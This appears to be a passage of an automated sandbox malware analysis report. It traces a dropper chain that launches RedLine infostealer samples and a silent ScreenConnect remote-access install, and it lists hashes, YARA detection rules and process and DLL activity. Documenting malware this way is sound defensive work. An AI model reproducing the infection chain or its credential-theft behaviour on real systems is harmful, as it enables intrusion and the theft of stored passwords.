Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_084EDD00	9_2_084EDD00
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_084E1210	9_2_084E1210
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_084E3311	9_2_084E3311
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_084E4468	9_2_084E4468
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_084E9628	9_2_084E9628
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_084ED108	9_2_084ED108
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135A68C	11_3_0135A68C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_0135C4D9	11_3_0135C4D9
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Code function: 11_3_05B5301C	11_3_05B5301C
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Code function: 14_2_0185F318	14_2_0185F318
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Code function: 14_2_01859C70	14_2_01859C70
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Code function: 14_2_01853E29	14_2_01853E29
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Code function: 14_2_0185D7E0	14_2_0185D7E0
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Code function: 14_2_05C16590	14_2_05C16590
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Code function: 14_2_05C1012B	14_2_05C1012B

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\5bzo1pz[1].exe 184C629038E05BAC72EB206A355D203612DDD7D4FBFFF49F5248463BDAA6672C
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loqVSeJ[1].exe 1E9FF1FC659F304A408CFF60895EF815D0A9D669A3D462E0046F55C8C6FEAFC2

Source: 5bzo1pz[1].exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz[1].exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz[1].exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz[1].exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz[1].exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz.exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz.exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz.exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz.exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 5bzo1pz.exe.7.dr	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: Ryay9q4aDy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: loqVSeJ.exe PID: 2848, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: Ryay9q4aDy.exe	Static PE information: Section: duovosop ZLIB complexity 0.994384023556231
Source: skotes.exe.0.dr	Static PE information: Section: duovosop ZLIB complexity 0.994384023556231
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: Section: rufmbtlx ZLIB complexity 0.994733317669173
Source: 7fOMOTQ.exe.7.dr	Static PE information: Section: rufmbtlx ZLIB complexity 0.994733317669173
Source: loqVSeJ[1].exe.7.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: loqVSeJ[1].exe.7.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: loqVSeJ.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: loqVSeJ.exe.7.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: tmp2A3C.tmp.9.dr	Static PE information: Section: duovosop ZLIB complexity 0.994384023556231

Source: loqVSeJ.exe.7.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: loqVSeJ[1].exe.7.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/118@3/5

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loqVSeJ[1].exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7301968 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: loqVSeJ.exe, 00000009.00000002.3001587383.00000000050C0000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.0000000005577000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000003.2805916378.0000000008CF8000.00000004.00000020.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.0000000005138000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4256212851.0000000005B5D000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4272893210.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4255458685.0000000005B7A000.00000004.00000800.00020000.00000000.sdmp, tmp5425.tmp.9.dr, tmp83D3.tmp.9.dr, tmp8365.tmp.9.dr, tmpB2A4.tmp.9.dr, tmpF36A.tmp.9.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ryay9q4aDy.exe	Virustotal: Detection: 48%
Source: Ryay9q4aDy.exe	ReversingLabs: Detection: 52%

Source: Ryay9q4aDy.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: loqVSeJ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: loqVSeJ.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

File read: C:\Users\user\Desktop\Ryay9q4aDy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ryay9q4aDy.exe "C:\Users\user\Desktop\Ryay9q4aDy.exe"
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe "C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe"
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe "C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe "C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe"
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\setup.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BAA1802996B66BC4A9CFB5C0759B44F5 C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7301968 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe "C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe "C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe "C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\setup.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BAA1802996B66BC4A9CFB5C0759B44F5 C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7301968 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Section loaded: mswsock.dll	Jump to behavior
